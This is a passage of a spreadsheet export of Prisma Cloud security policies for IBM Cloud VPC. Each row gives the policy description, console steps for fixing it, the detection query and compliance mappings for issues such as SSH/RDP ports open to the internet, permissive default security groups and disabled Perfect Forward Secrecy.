          <t>This policy identifies IBM Cloud Default Security groups that allow all traffic on SSH port 22. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. A VPC comes with a default security group whose initial configuration allows access from all members that are attached to this security group. If you do not specify a security group when you launch a Virtual Server, the Virtual Server is automatically assigned to this default security group. As a result, the Virtual Server will be having risk of uncontrolled connectivity. It is recommended that the Default Security Group allows network ports, protocols, and services listening on a system with validated business needs that are running on each system.</t>
        </is>
      </c>
      <c r="X3367" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Groups reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Security Groups'
3. Select the 'Security Groups' reported in the alert
4. Go to 'Inbound rules' under 'Rules' tab
5. Click on three dots on the right corner of a row containing rule that has 'Source type' as 'Any' and 'Value' as 22 (or range containing 22)
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3367" t="inlineStr"/>
      <c r="Z3367" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-vpc-network-security-group' AND json.rule = rules[?any( remote.cidr_block equals "0.0.0.0/0" and direction equals "inbound" and ( protocol equals "all" or ( protocol equals "tcp" and (( port_max greater than 22 and port_min less than 22 ) or ( port_max equals 22 and port_min equals 22 )))))] exists as X; config from cloud.resource where api.name = 'ibm-vpc' as Y; filter ' $.X.id equals $.Y.default_security_group.id '; show X;</t>
        </is>
      </c>
      <c r="AA3367" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3367" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3367" t="inlineStr">
        <is>
          <t>PC-IBM-NET-979</t>
        </is>
      </c>
      <c r="AD3367" t="b">
        <v>1</v>
      </c>
      <c r="AE3367" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3367" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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7" t="inlineStr">
        <is>
          <t>74294034-39e7-45b4-94ef-8dc278d7ff70</t>
        </is>
      </c>
      <c r="AI3367" t="inlineStr">
        <is>
          <t>9fab642f-edcd-4225-a413-f168c9f5816b</t>
        </is>
      </c>
      <c r="AJ3367" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3367" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3368">
      <c r="A3368" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1</t>
        </is>
      </c>
      <c r="B3368" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3368" s="2" t="inlineStr"/>
      <c r="D3368" t="inlineStr"/>
      <c r="E3368" t="inlineStr"/>
      <c r="F3368" t="inlineStr"/>
      <c r="G3368" t="b">
        <v>1</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3368" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3368" t="inlineStr">
        <is>
          <t>IBM Cloud Default Security Group allow ingress rule from 0.0.0.0/0</t>
        </is>
      </c>
      <c r="L3368" t="inlineStr"/>
      <c r="M3368" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3368" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3368" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3368" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3368" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="R3368" t="inlineStr">
        <is>
          <t>6.2.2</t>
        </is>
      </c>
      <c r="S3368" t="inlineStr"/>
      <c r="T3368" t="b">
        <v>0</v>
      </c>
      <c r="U3368" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3368" t="inlineStr">
        <is>
          <t>ibm-vpc-network-security-group</t>
        </is>
      </c>
      <c r="W3368" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Default Security Groups which has ingress rules that allow traffic from 0.0.0.0/0. A VPC comes with a default security group whose initial configuration allows access from all members that are attached to this security group. If you do not specify a security group when you launch a Virtual Server, the Virtual Server is automatically assigned to this default security group. As a result, the Virtual Server will be having risk of uncontrolled connectivity. It is recommended that Default Security Group allows network ports, protocols, and services listening on a system with validated business needs that are running on each system.</t>
        </is>
      </c>
      <c r="X3368" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Groups reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Security Groups'
3. Select the 'Security Groups' reported in the alert
4. Go to 'Inbound rules' under 'Rules' tab
5. Click on three dots on the right corner of a row containing rule that has 'Source type' as 'Any' or 'Source' as Security Groups name
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3368" t="inlineStr"/>
      <c r="Z3368" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-vpc-network-security-group' AND json.rule = rules[?any( ( remote.cidr_block equals "0.0.0.0/0" or remote.name equals $.name ) and direction equals "inbound" )] exists as X; config from cloud.resource where api.name = 'ibm-vpc' as Y; filter ' $.X.id equals $.Y.default_security_group.id '; show X;</t>
        </is>
      </c>
      <c r="AA3368" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3368" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3368" t="inlineStr">
        <is>
          <t>PC-IBM-NET-965</t>
        </is>
      </c>
      <c r="AD3368" t="b">
        <v>1</v>
      </c>
      <c r="AE3368" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3368" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>ac061a4b-becb-423c-bf3f-0898b0aed486</t>
        </is>
      </c>
      <c r="AI3368" t="inlineStr">
        <is>
          <t>f2d2945d-a509-44d8-abbc-12566ae7962d</t>
        </is>
      </c>
      <c r="AJ3368" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3368" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3369">
      <c r="A3369" t="inlineStr">
        <is>
          <t>CIS v1.1.0 (IBM Cloud) Level 1, HIPAA, NIST CSF v2.0, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, CRI Profile v2.0, GDPR, SOC 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3369" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3369" s="2" t="inlineStr"/>
      <c r="D3369" t="inlineStr"/>
      <c r="E3369" t="inlineStr"/>
      <c r="F3369" t="inlineStr"/>
      <c r="G3369" t="b">
        <v>1</v>
      </c>
      <c r="H336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69" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3369" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3369" t="inlineStr">
        <is>
          <t>IBM Cloud Security Group allow all traffic on RDP port (3389)</t>
        </is>
      </c>
      <c r="L3369" t="inlineStr"/>
      <c r="M3369" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3369" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3369" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3369" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3369" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3369" t="inlineStr">
        <is>
          <t>SC-07-05 : Boundary Protection | Deny by Default — Allow by Exception</t>
        </is>
      </c>
      <c r="S3369" t="inlineStr"/>
      <c r="T3369" t="b">
        <v>0</v>
      </c>
      <c r="U3369" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3369" t="inlineStr">
        <is>
          <t>ibm-vpc-network-security-group</t>
        </is>
      </c>
      <c r="W3369" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Security groups that allow all traffic on RDP port 3389. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. Review your list of security group rules to ensure that your resources are not exposed. As a best practice, restrict RDP solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X3369" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Groups reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Security Groups'
3. Select the 'Security Groups' reported in the alert
4. Go to 'Inbound rules' under 'Rules' tab
5. Click on three dots on the right corner of a row containing rule that has 'Source type' as 'Any' and 'Value' as 3389 (or range containing 3389)
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3369" t="inlineStr"/>
      <c r="Z3369" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-security-group' AND json.rule = rules[?any( remote.cidr_block equals "0.0.0.0/0" and direction equals "inbound" and ( protocol equals "all" or ( protocol equals "tcp" and ( port_max greater than 3389 and port_min less than 3389 ) or ( port_max equals 3389 and port_min equals 3389 ))))] exists</t>
        </is>
      </c>
      <c r="AA3369" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3369" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3369" t="inlineStr">
        <is>
          <t>PC-IBM-NET-967</t>
        </is>
      </c>
      <c r="AD3369" t="b">
        <v>1</v>
      </c>
      <c r="AE3369" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3369" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG336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69" t="inlineStr">
        <is>
          <t>c457f45c-2970-4cfb-9a65-a9a7007976f8</t>
        </is>
      </c>
      <c r="AI3369" t="inlineStr">
        <is>
          <t>87f4b0b2-47bd-45ed-b4be-5b7f8726b1e3</t>
        </is>
      </c>
      <c r="AJ3369" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3369" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3370">
      <c r="A3370" t="inlineStr">
        <is>
          <t>HIPAA, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, ITSG-33, SOC 2, ITSG-33, TX-RAMP Level 2, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3370" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3370" s="2" t="inlineStr"/>
      <c r="D3370" t="inlineStr"/>
      <c r="E3370" t="inlineStr"/>
      <c r="F3370" t="inlineStr"/>
      <c r="G3370" t="b">
        <v>1</v>
      </c>
      <c r="H33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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3370" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3370" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Private Cloud (VPC) security group contains outbound rules that specify source IP 8.8.8.8/32 to DNS port</t>
        </is>
      </c>
      <c r="L3370" t="inlineStr"/>
      <c r="M3370" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3370" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3370" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3370" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3370" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R3370" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S3370" t="inlineStr"/>
      <c r="T3370" t="b">
        <v>0</v>
      </c>
      <c r="U3370" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3370" t="inlineStr">
        <is>
          <t>ibm-vpc-network-security-group</t>
        </is>
      </c>
      <c r="W3370" t="inlineStr">
        <is>
          <t>This policy identifies IBM Virtual Private Cloud (VPC) security groups that contain outbound rules that specify a source IP 8.8.8.8/32 to DNS port. Doing so, may allow sensitive data from the protected resource being leaked to Google, which uses data for indexing and monetizing. As a best practice, restrict DNS port (53) solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X3370" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Groups reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Security Groups'
3. Select the 'Security Groups' reported in the alert
4. Go to 'Outbound rules' under 'Rules' tab
5. Click on three dots on the right corner of a row containing rule that has 'Destination type' as 'Any' and 'Value' as 53 (or range containing 53)
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3370" t="inlineStr"/>
      <c r="Z3370" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-security-group' AND json.rule = rules[?any( remote.cidr_block equals "8.8.8.8/32" and direction equals "outbound" and ( protocol equals "all" or ( protocol equals "tcp" and ( port_max greater than 53 and port_min less than 53 ) or ( port_max equals 53 and port_min equals 53 ))))] exists</t>
        </is>
      </c>
      <c r="AA3370" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3370" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3370" t="inlineStr">
        <is>
          <t>PC-IBM-NET-990</t>
        </is>
      </c>
      <c r="AD3370" t="b">
        <v>1</v>
      </c>
      <c r="AE3370" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3370" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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0" t="inlineStr">
        <is>
          <t>fc6db7f9-eafe-45b5-972a-1034df43ca30</t>
        </is>
      </c>
      <c r="AI3370" t="inlineStr">
        <is>
          <t>9b72b02a-cb26-4e10-8b8b-7fbe0fa49ae2</t>
        </is>
      </c>
      <c r="AJ3370" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3370" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3371">
      <c r="A3371" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3371" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3371" s="2" t="inlineStr"/>
      <c r="D3371" t="inlineStr"/>
      <c r="E3371" t="inlineStr"/>
      <c r="F3371" t="inlineStr"/>
      <c r="G3371" t="b">
        <v>1</v>
      </c>
      <c r="H33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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3371" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3371" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Private Cloud (VPC) Subnet has public gateways attached</t>
        </is>
      </c>
      <c r="L3371" t="inlineStr"/>
      <c r="M3371" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3371" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3371" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3371" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3371" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R3371" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S3371" t="inlineStr"/>
      <c r="T3371" t="b">
        <v>0</v>
      </c>
      <c r="U3371" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3371" t="inlineStr">
        <is>
          <t>ibm-vpc-network-subnet</t>
        </is>
      </c>
      <c r="W3371" t="inlineStr">
        <is>
          <t>This policy identifies IBM Virtual Private Cloud Subnet where public gateway attached. A Public Gateway enables resources to connect to the internet. After public gateway is attached, all resources in that subnet can connect to the internet. If the use case for public gateway is not external connectivity, it is recommended not to attach any public gateways.</t>
        </is>
      </c>
      <c r="X3371" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Public Gateways'
3. Select the 'Public Gateway' reported in the alert
4. From the drop down select Detach
5. Safely detach the public gateway and then delete the public gateway</t>
        </is>
      </c>
      <c r="Y3371" t="inlineStr"/>
      <c r="Z3371" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-subnet' and json.rule = public_gateway exists</t>
        </is>
      </c>
      <c r="AA3371" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3371" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3371" t="inlineStr">
        <is>
          <t>PC-IBM-NET-984</t>
        </is>
      </c>
      <c r="AD3371" t="b">
        <v>1</v>
      </c>
      <c r="AE3371" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3371" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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1" t="inlineStr">
        <is>
          <t>a4470ac0-9097-4bb9-83af-6565e0ef7a77</t>
        </is>
      </c>
      <c r="AI3371" t="inlineStr">
        <is>
          <t>900b86ad-a9b6-45bf-b8f1-8b300a7e3b07</t>
        </is>
      </c>
      <c r="AJ3371" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3371" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3372">
      <c r="A3372" t="inlineStr">
        <is>
          <t>HIPAA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), GDPR, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B3372" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3372" s="2" t="inlineStr"/>
      <c r="D3372" t="inlineStr"/>
      <c r="E3372" t="inlineStr"/>
      <c r="F3372" t="inlineStr"/>
      <c r="G3372" t="b">
        <v>1</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3372" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3372" t="inlineStr">
        <is>
          <t>IBM Cloud VPN Connections for VPC has an IPsec policy that have Perfect Forward Secrecy (PFS) disabled</t>
        </is>
      </c>
      <c r="L3372" t="inlineStr"/>
      <c r="M3372" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3372" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3372" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3372" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3372" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R3372" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S3372" t="inlineStr"/>
      <c r="T3372" t="b">
        <v>0</v>
      </c>
      <c r="U3372" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3372" t="inlineStr">
        <is>
          <t>ibm-vpc-network-vpn-gateway</t>
        </is>
      </c>
      <c r="W3372" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud VPN Gateway with connections with IPsec policy that has Perfect Forward Secrecy disabled. Perfect Forward Secrecy is an encryption system that changes the keys used to encrypt and decrypt information frequently and automatically. This ensures that derived session keys are not compromised if one of the private keys is compromised in the future. It is recommended to enable Perfect Forward Secrecy.</t>
        </is>
      </c>
      <c r="X3372" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'VPNs'
3. Select the 'Site-to-site gateways' and select the gateway reported in the alert.
4. In the Gateway 'Overview' page, under 'VPN connections', please note down the 'IPsec policy' name for each connection
5. From left navigation pane select 'VPNs', under 'Site-to-site gateways' select 'IPsec policies'.
6. Select required region, and perform below steps for all above noted down IPsec policies.
7. For each policy click on 'elipsis' menu icon on the right and select 'Edit'.
8. In 'Edit IPsec policy' page, slide the 'Perfect Forward Secrecy' feature to enabled.
9. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3372" t="inlineStr"/>
      <c r="Z3372" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-vpc-network-vpn-gateway' AND json.rule = status equal ignore case available as X; config from cloud.resource where api.name = 'ibm-vpc-network-vpn-ipsec-policy' AND json.rule = pfs equals disabled as Y; filter '$.X.connections[*].id contains $.Y.connections[*].id'; show X;</t>
        </is>
      </c>
      <c r="AA3372" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3372" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3372" t="inlineStr">
        <is>
          <t>PC-IBM-NET-987</t>
        </is>
      </c>
      <c r="AD3372" t="b">
        <v>1</v>
      </c>
      <c r="AE3372" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3372" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>75ef7666-c96b-4684-8194-4f4ec15ee095</t>
        </is>
      </c>
      <c r="AI3372" t="inlineStr">
        <is>
          <t>c5073ccb-8107-4dc8-a940-adcf59c0d902</t>
        </is>
      </c>
      <c r="AJ3372" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3372" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3373">
      <c r="A3373" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, SOC 2, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, DORA, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 1, ITSG-33, SOC 2, GDPR, SOC 2, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3373" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3373" s="2" t="inlineStr"/>
      <c r="D3373" t="inlineStr"/>
      <c r="E3373" t="inlineStr"/>
      <c r="F3373" t="inlineStr"/>
      <c r="G3373" t="b">
        <v>1</v>
      </c>
      <c r="H33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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3373" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3373" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Server Image for Virtual Private Cloud (VPC) using basic Provider Managed Encryption</t>
        </is>
      </c>
      <c r="L3373" t="inlineStr"/>
      <c r="M3373" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3373" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3373" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3373" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3373" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R3373" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S3373" t="inlineStr"/>
      <c r="T3373" t="b">
        <v>0</v>
      </c>
      <c r="U3373" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3373" t="inlineStr">
        <is>
          <t>ibm-vpc-virtual-server-image</t>
        </is>
      </c>
      <c r="W3373" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Virtual Server Images for Virtual Private Cloud (VPC) which are not provisioned with Customer Managed Encryption and are using the basic Provider Managed Encryption. With customer-managed encryption, one can import own root keys to the cloud. This process is commonly called "bring your own key". When the encryption is managed by a cloud service provider, the image may still be vulnerable to unauthorized user access and manipulation. Customer-managed encryption (Key Protect &amp; Hyper Protect Crypto Service) provides better audit records for root key usage, therefore it is recommended to use Customer Managed Encrypted Images.</t>
        </is>
      </c>
      <c r="X3373" t="inlineStr">
        <is>
          <t>The encryption type of the Image cannot be changed once set. If the image's encryption type is set to default (Provider Managed Encryption), Then the image must be deleted and created once again with Customer Managed Encryption
To safely delete the image which has default Provider Managed encryption, follow these steps:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then select 'Images'
3. Select the 'Image Name' reported in the alert
4. Click on the 'Actions' dropdown
5. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3373" t="inlineStr"/>
      <c r="Z3373" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-virtual-server-image' AND json.rule = status equals "available" and encryption equal ignore case "none"</t>
        </is>
      </c>
      <c r="AA3373" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3373" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3373" t="inlineStr">
        <is>
          <t>PC-IBM-VSP-988</t>
        </is>
      </c>
      <c r="AD3373" t="b">
        <v>1</v>
      </c>
      <c r="AE3373" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3373" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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3" t="inlineStr">
        <is>
          <t>6a149c46-cfe5-4b44-baed-9fdf0a26adc2</t>
        </is>
      </c>
      <c r="AI3373" t="inlineStr">
        <is>
          <t>65a79db8-17d0-4e26-8cd4-801d2bc6e32c</t>
        </is>
      </c>
      <c r="AJ3373" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3373" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3374">
      <c r="A3374" t="inlineStr">
        <is>
          <t>Telecommunications Security Act - TSA, ITSG-33, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3374" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3374" s="2" t="inlineStr"/>
      <c r="D3374" t="inlineStr"/>
      <c r="E3374" t="inlineStr"/>
      <c r="F3374" t="inlineStr"/>
      <c r="G3374" t="b">
        <v>1</v>
      </c>
      <c r="H33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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3374" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3374" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Servers for VPC instance has interface with IP-spoofing enabled</t>
        </is>
      </c>
      <c r="L3374" t="inlineStr"/>
      <c r="M3374" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3374" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
